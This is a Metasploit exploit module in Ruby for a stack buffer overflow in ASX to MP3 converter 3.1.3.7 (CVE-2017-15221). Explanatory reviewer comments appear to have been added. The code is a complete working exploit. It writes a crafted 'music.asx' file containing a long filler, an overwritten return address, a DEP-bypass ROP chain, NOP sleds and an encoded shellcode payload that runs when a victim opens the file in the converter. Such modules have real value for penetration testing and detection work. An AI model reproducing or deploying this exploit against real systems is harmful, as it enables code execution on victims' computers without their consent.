ASX to MP3 converter 3.1.3.7 – ‘.asx’ Local Stack Overflow (Metasploit, DEP Bypass)
require 'msf/core'
# Metasploit file-format exploit module for the ASX to MP3 converter 3.1.3.7
# stack overflow (references below: CVE-2017-15221, EDB 47468).
#
# Although the base class is Msf::Exploit::Remote, nothing in this module
# touches the network: the FILEFORMAT mixin supplies file_create, and #exploit
# only writes a crafted .asx file (default name 'music.asx') that has to be
# opened in the converter on the victim machine.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata (name, description, references, the single target, payload
  # constraints) plus the FILENAME option.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",
      # %q literal below is kept byte-for-byte (its leading whitespace is part of the string).
      'Description' => %q{
This module exploits a stack buffer overflow in ASX to MP3 converter 3.1.3.7.
By constructing a specially crafted ASX file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, x64-based PC
Microsoft Windows 10 Pro, 10.0.18362 N/A Build 18362, x64-based PC
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Maxim Guslyaev',
        ],
      'References' =>
        [
          [ 'CVE', '2017-15221' ],
          [ 'EDB', '47468' ]
        ],
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows 7 Enterprise/10 Pro',
            {
              # Value #exploit writes directly after the 17417-byte filler
              # (i.e. over the saved return address). Which DLL it belongs to is
              # not stated on this page.
              # NOTE(review): the same value is repeated as a bare literal inside
              # the chain in #exploit instead of target.ret, so adding a second
              # target would require changing both places.
              'Ret' => 0x1002D038
            }
          ]
        ],
      'Payload' =>
        {
          # Bytes the encoder must keep out of the payload: NUL, tab, newline.
          # Presumably because .asx is a line-oriented text format -- confirm.
          'BadChars' => "\x00\x09\x0a"
        },
      'Privileged' => false,
      # NOTE(review): current Metasploit linting expects ISO dates ("2019-10-06");
      # this older "Mon DD YYYY" form is likely to be flagged by msftidy.
      'DisclosureDate' => "Oct 06 2019",
      'DefaultTarget' => 0))

    register_options(
      [
        # Name of the file written by file_create.
        OptString.new('FILENAME', [true, 'The malicious file name', 'music.asx'])
      ])
  end

  # Builds the crafted .asx contents and writes them out with file_create.
  #
  # Layout, in order (every multi-byte value is pack("V"): 32-bit unsigned
  # little-endian, so the converter is assumed to run as a 32-bit x86 process):
  #   1. "http://"                  (7 bytes)
  #   2. "A" * 17417                filler up to the saved return address
  #   3. target.ret + "CCCC"        (4 + 4 bytes)
  #   4. a fixed sequence of 32-bit values -- the DEP-bypass chain named in the
  #      module title. The values are reproduced exactly as the author gave
  #      them; what each one does is not documented on this page.
  #   5. "\x90" * 4, one more 32-bit value, "\x90" * 20  (0x90 = x86 NOP)
  #   6. payload.encoded
  #
  # Detection note: a file starting with "http://" followed by a 17417-byte run
  # of 'A', with runs of 0x90 further on, is a distinctive on-disk artefact of
  # this module.
  #
  # Style note: each `buf +=` allocates a fresh String; `buf << ...` would append
  # in place. Left unchanged so the emitted byte sequence stays verifiably the same.
  def exploit
    buf = "http://"
    # 7 + 17417 + 4 + 4 = 17432 bytes precede the chain below.
    buf += "A" * 17417 + [target.ret].pack("V") + "CCCC"
    # Start of the fixed 32-bit value sequence (see method comment, item 4).
    buf += [0x10047F4D].pack("V")
    buf += [0x11111111].pack("V")
    buf += [0x10029B8C].pack("V")
    buf += [0x1002D493].pack("V")
    buf += [0xEEEEFEEF].pack("V")
    buf += [0x10047F4D].pack("V")
    buf += [0x41414141].pack("V")
    buf += [0x1002fade].pack("V")
    buf += [0x1004f060].pack("V")
    buf += [0x1003239f].pack("V")
    buf += [0x10040754].pack("V")
    buf += [0x41414141].pack("V")
    buf += [0x41414141].pack("V")
    buf += [0x1004d881].pack("V")
    # The same value repeated 13 times.
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x1003b34d].pack("V")
    buf += [0x10034735].pack("V")
    buf += [0x10031c6c].pack("V")
    buf += [0x10012316].pack("V")
    buf += [0x1002ca22].pack("V")
    buf += [0xFFFFFFFF].pack("V")
    buf += [0x10031ebe].pack("V")
    buf += [0x10031ebe].pack("V")
    # The same value repeated 6 times.
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002a5b7].pack("V")
    buf += [0x1002e346].pack("V")
    # Same value as the target's 'Ret' entry, written here as a literal.
    buf += [0x1002D038].pack("V")
    buf += [0x1002E516].pack("V")
    buf += [0xA4E2F275].pack("V")
    buf += [0x1003efe2].pack("V")
    buf += [0x10040ce5].pack("V")
    buf += "\x90" * 4
    buf += [0x1003df73].pack("V")
    buf += "\x90" * 20
    # Encoded payload (subject to the BadChars declared in initialize) goes last.
    buf += payload.encoded
    # Writes buf to the FILENAME option; supplied by Msf::Exploit::FILEFORMAT.
    file_create(buf)
  end
end